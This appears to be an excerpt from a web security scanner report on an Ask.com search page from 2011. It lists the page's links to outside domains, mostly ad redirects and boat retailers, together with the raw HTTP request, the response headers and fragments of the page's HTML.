<a href="http://www.google.com/aclk?sa=l&ai=CXuOXV8RBTcz9Kou-gweIp7S4D5yQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGgICkJKABgOjN_APIAQGqBBtP0Piu5aPmsOrtiXbsu_EhDG4KUxwYGRKxPak&num=4&sig=AGiWqtxZnmJeoiny_ZDCkxzEKCH2_jHuLA&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(1); if (typeof efclk != 'undefined') efclk(1); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CcR1kV8RBTcz9Kou-gweIp7S4D6n3pJ4B5ZrwpxLfgdAFEAUg-_6BAygFUNvdkej7_____wFgyYaAgKQkyAEBqgQYT9Cot-aj57Dq7Ykv7QHJ0QaBrLbOrU7e&num=5&sig=AGiWqtyla0qgW6YU8dJdxM3oC9nd8PaXgA&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(85); if (typeof efclk != 'undefined') efclk(85); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_4');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CcR1kV8RBTcz9Kou-gweIp7S4D6n3pJ4B5ZrwpxLfgdAFEAUg-_6BAygFUNvdkej7_____wFgyYaAgKQkyAEBqgQYT9Cot-aj57Dq7Ykv7QHJ0QaBrLbOrU7e&num=5&sig=AGiWqtyla0qgW6YU8dJdxM3oC9nd8PaXgA&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(85); if (typeof efclk != 'undefined') efclk(85); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_4');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1296505615?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.34. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=regulator+boat&search=&qsrc=0&o=0&l=dir

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/CLWfju2L26YCFUWo4AodSDJP7w/aj-cat.png
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1022888328?
http://grillautomotivebestbuy.co.cc/info-Camco_40053_RV_Brass_Water_Pressure_Regulator-B000BQ7WH2.html
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.askkids.com/?o=0&l=dir
http://www.boatworldusa.com/
http://www.comstockyachtsales.com/
http://www.comstockyachtsales.com/aboutus.asp
http://www.fishingandboats.com/boat-regulator.html
http://www.google.com/aclk?sa=L&ai=C-3uWyMNBTbWbBMXQggfI5Lz6Dvrhr8IB-LvxmQWM05gsEAEg-_6BAygFULbt844HYMmGo4fUo4AQyAEBqgQcT9CiUL2x7AzZ6kRAYUhhBOXpwLg1d0oUoab39A&num=1&sig=AGiWqtyDArmYr7MoWPcckN6wmR1i2zj75w&adurl=http://www.gootees.com
http://www.google.com/aclk?sa=L&ai=C3pr7yMNBTbWbBMXQggfI5Lz6DsmNwHPR0I-RDdbRiAcQBCD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAnKI1I7Exro-qgQbT9DyHc2x6QTZGkd66N-s3oZXEclPzI8CLUXk&num=4&sig=AGiWqtx0ihnwiY--aE9T3UynJ_M_RH6kDg&adurl=http://www.pharmalinkconsulting.co.uk
http://www.google.com/aclk?sa=L&ai=C6MojyMNBTbWbBMXQggfI5Lz6Dqn3pJ4B5ZrwpxLfgdAFEAMg-_6BAygFUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0OJErLHuDNn7RZo00QvZWfNyV0hj&num=3&sig=AGiWqtzQRlN0C4TyZRs7AydQonjyEpvIHA&adurl=http://www.gatewaymarina.com/ship_store.html
http://www.google.com/aclk?sa=l&ai=C2u0JyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUNCLsoUCYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqtyqnyV9YACdmIUd3I1uHBwi1TaOYQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats
http://www.google.com/aclk?sa=l&ai=CBUHhyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUPeXq-oFYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&sig=AGiWqtxpLZ2vM7f5XLXz2QrraD-llheIsg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts
http://www.google.com/aclk?sa=l&ai=CSN7FyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUN64i676_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxfaQ8a2FqsV8kHIW9RCCMQJdtwJQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing
http://www.google.com/aclk?sa=l&ai=CghMyyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUIzAuNf8_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxIqo9W0EOPstvvwcu4lgiV-9_nJA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture
http://www.google.com/aclk?sa=l&ai=ChnilyMNBTbWbBMXQggfI5Lz6DpyQkeEBpIyLrBTc66IsEAIg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q4iKase8M2aJE-zPdFQPp9xoIMR8Vbd0&num=2&sig=AGiWqtyIsbu6EciQStUSPIX6WHKtzp8t1g&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404
http://www.google.com/aclk?sa=l&ai=CyNziyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUP_fwIgEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqty3WLVZV9osAWmuBhbedOlDB86V7g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool
http://www.reel-time.com/forum/showthread.php?t=41911
http://www.regulatormarine.com/
http://www.regulatormarine.com/32fs.html
http://www.regulatormarinegear.com/
http://www.yachtworld.com/boats/category/type/Regulator

Request

GET /web?q=regulator+boat&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:11 GMT; Path=/
Set-Cookie: clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:11 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Content-Length: 135359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=regulator+boat"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a001',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...

<img src="http://4.afs.googleadservices.com/images/partners/CLWfju2L26YCFUWo4AodSDJP7w/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>

<span class="T7 fr tp info txt0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C-3uWyMNBTbWbBMXQggfI5Lz6Dvrhr8IB-LvxmQWM05gsEAEg-_6BAygFULbt844HYMmGo4fUo4AQyAEBqgQcT9CiUL2x7AzZ6kRAYUhhBOXpwLg1d0oUoab39A&num=1&sig=AGiWqtyDArmYr7MoWPcckN6wmR1i2zj75w&adurl=http://www.gootees.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_0');" class="nu" onmouseover="return ss('www.gootees.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C-3uWyMNBTbWbBMXQggfI5Lz6Dvrhr8IB-LvxmQWM05gsEAEg-_6BAygFULbt844HYMmGo4fUo4AQyAEBqgQcT9CiUL2x7AzZ6kRAYUhhBOXpwLg1d0oUoab39A&num=1&sig=AGiWqtyDArmYr7MoWPcckN6wmR1i2zj75w&adurl=http://www.gootees.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_0');" class="nu" onmouseover="return ss('www.gootees.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=ChnilyMNBTbWbBMXQggfI5Lz6DpyQkeEBpIyLrBTc66IsEAIg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q4iKase8M2aJE-zPdFQPp9xoIMR8Vbd0&num=2&sig=AGiWqtyIsbu6EciQStUSPIX6WHKtzp8t1g&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(83); if (typeof efclk != 'undefined') efclk(83); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_1');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=ChnilyMNBTbWbBMXQggfI5Lz6DpyQkeEBpIyLrBTc66IsEAIg-_6BAygFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q4iKase8M2aJE-zPdFQPp9xoIMR8Vbd0&num=2&sig=AGiWqtyIsbu6EciQStUSPIX6WHKtzp8t1g&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(83); if (typeof efclk != 'undefined') efclk(83); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_1');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C6MojyMNBTbWbBMXQggfI5Lz6Dqn3pJ4B5ZrwpxLfgdAFEAMg-_6BAygFUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0OJErLHuDNn7RZo00QvZWfNyV0hj&num=3&sig=AGiWqtzQRlN0C4TyZRs7AydQonjyEpvIHA&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(72); if (typeof efclk != 'undefined') efclk(72); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_2');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C6MojyMNBTbWbBMXQggfI5Lz6Dqn3pJ4B5ZrwpxLfgdAFEAMg-_6BAygFUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0OJErLHuDNn7RZo00QvZWfNyV0hj&num=3&sig=AGiWqtzQRlN0C4TyZRs7AydQonjyEpvIHA&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(72); if (typeof efclk != 'undefined') efclk(72); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_2');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=C3pr7yMNBTbWbBMXQggfI5Lz6DsmNwHPR0I-RDdbRiAcQBCD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAnKI1I7Exro-qgQbT9DyHc2x6QTZGkd66N-s3oZXEclPzI8CLUXk&num=4&sig=AGiWqtx0ihnwiY--aE9T3UynJ_M_RH6kDg&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(37); if (typeof efclk != 'undefined') efclk(37); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_3');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C3pr7yMNBTbWbBMXQggfI5Lz6DsmNwHPR0I-RDdbRiAcQBCD7_oEDKAVQlbmT_wZgyYajh9SjgBDIAQGpAnKI1I7Exro-qgQbT9DyHc2x6QTZGkd66N-s3oZXEclPzI8CLUXk&num=4&sig=AGiWqtx0ihnwiY--aE9T3UynJ_M_RH6kDg&adurl=http://www.pharmalinkconsulting.co.uk" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(37); if (typeof efclk != 'undefined') efclk(37); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_3');" class="nu" onmouseover="return ss('www.pharmalinkconsulting.co.uk')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CBUHhyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUPeXq-oFYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&sig=AGiWqtxpLZ2vM7f5XLXz2QrraD-llheIsg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(58); if (typeof efclk != 'undefined') efclk(58); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=CBUHhyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUPeXq-oFYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&sig=AGiWqtxpLZ2vM7f5XLXz2QrraD-llheIsg&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(58); if (typeof efclk != 'undefined') efclk(58); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CSN7FyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUN64i676_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxfaQ8a2FqsV8kHIW9RCCMQJdtwJQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(58); if (typeof efclk != 'undefined') efclk(58); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CSN7FyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUN64i676_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxfaQ8a2FqsV8kHIW9RCCMQJdtwJQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C2u0JyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUNCLsoUCYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqtyqnyV9YACdmIUd3I1uHBwi1TaOYQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(58); if (typeof efclk != 'undefined') efclk(58); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C2u0JyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUNCLsoUCYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqtyqnyV9YACdmIUd3I1uHBwi1TaOYQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CyNziyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUP_fwIgEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqty3WLVZV9osAWmuBhbedOlDB86V7g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(58); if (typeof efclk != 'undefined') efclk(58); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CyNziyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUP_fwIgEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_QomuVsegM2epEZVxOdATl6cC4NXdKFKGm9_Q&num=5&ctype=4&sig=AGiWqty3WLVZV9osAWmuBhbedOlDB86V7g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CghMyyMNBTbWbBMXQggfI5Lz6DtvO8tsBi8y6yxe9rLMHEAUg-_6BAygFUIzAuNf8_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9Cia5Wx6AzZ6kRlXE50BOXpwLg1d0oUoab39A&num=5&ctype=4&sig=AGiWqtxIqo9W0EOPstvvwcu4lgiV-9_nJA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(58); if (typeof efclk != 'undefined') efclk(58); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D14a8Lu-z94%26sgch%3D95f9DK1QV'},'gg_4');" class="nu" onmouseover="return 